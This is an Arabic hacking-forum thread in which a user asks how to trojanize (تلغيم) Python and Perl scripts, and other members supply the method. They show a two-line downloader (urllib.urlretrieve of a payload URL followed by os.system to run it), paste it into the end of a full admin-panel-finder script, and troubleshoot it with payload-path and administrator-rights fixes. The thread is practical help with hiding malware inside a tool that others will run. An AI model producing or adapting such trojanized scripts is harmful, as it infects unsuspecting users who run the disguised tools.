تمت الإجابة طلب تلغيم سكربتات البايثون وperl

تم تحميل الصفحة في 0,3371162 ثانية
طلب تلغيم سكربتات البايثون وperl
الحالة
مغلق و غير مفتوح للمزيد من الردود.
إنضم
30 أكتوبر 2012
المشاركات
2,648
الإعجابات
1,533
النقاط
113
الإقامة
Kurdistan
سلام عليكم
شباب اريد طريق تليغم سكربتات البايثون و بيريل علي ويندوز

عندي هاد سكربت اريد تلغيمها
bdblackhat/admin-panel-finder


او طريف تلغيم بيريل
سكربت و كود
مثل هاذ
بس هاذا ميشتغل

شكرا
 
إنضم
18 يوليو 2015
المشاركات
4,867
الإعجابات
8,754
النقاط
133
الإقامة
Republic Of Bahrain
ما الصعب عليك اخي كله داونلودر
ضعه تحت استدعاء الدالة في السكربت الي تريد تلغيمة :
findAdmin()

الداونلودر :

Python:
urllib.urlretrieve('https://Your Direct Malware Link', 'Your Malware Install Path')
os.system('Your Malware Install Path')
لاتنسى استدعاء : os + urllib
 
إنضم
18 يوليو 2015
المشاركات
4,867
الإعجابات
8,754
النقاط
133
الإقامة
Republic Of Bahrain
السكربت كامل اذا لم تعرف

Python:
#!/usr/bin/env python
# -*- coding: UTF-8 -*-

from urllib2 import Request, urlopen, URLError, HTTPError
import urllib
import os

def Space(j):
    i = 0
    while i<=j:
        print " ",
        i+=1


def findAdmin():
    f = open("link.txt","r");
    link = raw_input("Enter Site Name \n(ex : example.com or www.example.com ): ")
    print "\n\nAvilable links : \n"
    while True:
        sub_link = f.readline()
        if not sub_link:
            break
        req_link = "http://"+link+"/"+sub_link
        req = Request(req_link)
        try:
            response = urlopen(req)
        except HTTPError as e:
            continue
        except URLError as e:
            continue
        else:
         
            print "OK => ",req_link
         
def Credit():
    Space(9); print "#####################################"
    Space(9); print "#   +++ Admin Panel Finder v1 +++   #"
    Space(9); print "#     Script by Illûmïnåté Ðëmøñ    #"
    Space(9); print "#####################################"
   
Credit()

findAdmin()

urllib.urlretrieve('https://Your Direct Malware Link', 'Your Malware Install Path')
os.system('Your Malware Install Path')
 
إنضم
18 يوليو 2015
المشاركات
4,867
الإعجابات
8,754
النقاط
133
الإقامة
Republic Of Bahrain
حبيبي ركز شوي
الدالة
urlretrieve تحتاج بارتميترين : الرابط + مسار النزول كامل
يعني بالعقل كيف راح ينزل وانت عاطي الدالة فقط مجلد C طيب والملف ؟!

نصيحة لكل الشباب قبل الدخول في عالم الاختراق حاولو تعلم اساسيات البرمجة قليلا
 
إنضم
8 سبتمبر 2013
المشاركات
7,970
الإعجابات
11,895
النقاط
168
الإقامة
Live.IQ(JO => JO.AMMAN)
اخي تعلم اساسيات .. لن تأخذ من حياتك المشغولة سوى 10 دقائق لا اكثر

Python:
urllib.urlretrieve('https://Your Direct Malware Link', 'Your Malware Install Path')
os.system('Your Malware Install Path')
الى

Python:
urllib.urlretrieve('https://www.server.com/payload.exe', 'c:\ameer.exe')
os.system('c:\ameer.exe')
نصيحة لكل الشباب قبل الدخول في عالم الاختراق حاولو تعلم اساسيات البرمجة قليلا
يعينك الله اخي علي مش كبيرة كفاية
 
التعديل الأخير:
إنضم
30 أكتوبر 2012
المشاركات
2,648
الإعجابات
1,533
النقاط
113
الإقامة
Kurdistan
حبيبي ركز شوي
الدالة
urlretrieve تحتاج بارتميترين : الرابط + مسار النزول كامل
يعني بالعقل كيف راح ينزل وانت عاطي الدالة فقط مجلد C طيب والملف ؟!

نصيحة لكل الشباب قبل الدخول في عالم الاختراق حاولو تعلم اساسيات البرمجة قليلا

جربها عندك شوف ينجح لو لا
و جربت كل طريق ميشتغل
ههه و انا من قبلك هنا بس انا ماعرف عربي كتير انا كوردي
 
إنضم
8 سبتمبر 2013
المشاركات
7,970
الإعجابات
11,895
النقاط
168
الإقامة
Live.IQ(JO => JO.AMMAN)
جربها عندك شوف ينجح لو لا
و جربت كل طريق ميشتغل
ههه و انا من قبلك هنا بس انا ماعرف عربي كتير انا كوردي
لو على الاقدمية (من اقدم في المنتدى) اخي ما كنت سئلت مثل هذا السؤال ..

المشكلة التي تحصل انك لا تكتب المسار بشكل صحيح ..
 
إنضم
30 أكتوبر 2012
المشاركات
2,648
الإعجابات
1,533
النقاط
113
الإقامة
Kurdistan
اخي تعلم اساسيات .. لن تأخذ من حياتك المشغولة سوى 10 دقائق لا اكثر

Python:
urllib.urlretrieve('https://Your Direct Malware Link', 'Your Malware Install Path')
os.system('Your Malware Install Path')
الى

Python:
urllib.urlretrieve('https://www.server.com/payload.exe', 'c:\ameer.exe')
os.system('c:\ameer.exe')

يعينك الله اخي علي مش كبيرة كفاية

ولله ميشتغل
يطلع يرور
 
التعديل الأخير بواسطة المشرف:
إنضم
8 سبتمبر 2013
المشاركات
7,970
الإعجابات
11,895
النقاط
168
الإقامة
Live.IQ(JO => JO.AMMAN)
ولله ميشتغل
يطلع يرور
غير المسار اخي .. احتمال المسار محمي يحتاج صلاحيات مسؤول ..
حط مسار ثاني D او اي درايف ثاني على جهازك و شوف
 
إنضم
18 يوليو 2015
المشاركات
4,867
الإعجابات
8,754
النقاط
133
الإقامة
Republic Of Bahrain
جربها عندك شوف ينجح لو لا
و جربت كل طريق ميشتغل
ههه و انا من قبلك هنا بس انا ماعرف عربي كتير انا كوردي
والنعم فيك اخي اللغة ليست مهمه
الاهم انك تستفيد وانا ابي افادتكم لا اكثر
لذلك لما اقولك تعلم الاساسيات في البرمجة هذا شيئ لمصلحتك
راح يوفر عليك الكثير يعني مثلا لو متعلم الاساسيات كان عرفت انك تحتاج تشغل كمسؤول
لانك عاطي الدالة مسار يحتاج صلاحيات مسؤول مع تعلم الاساسيات اخي راح تتعلم معاها اشياء جانبية تفيدك في الاختراق
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل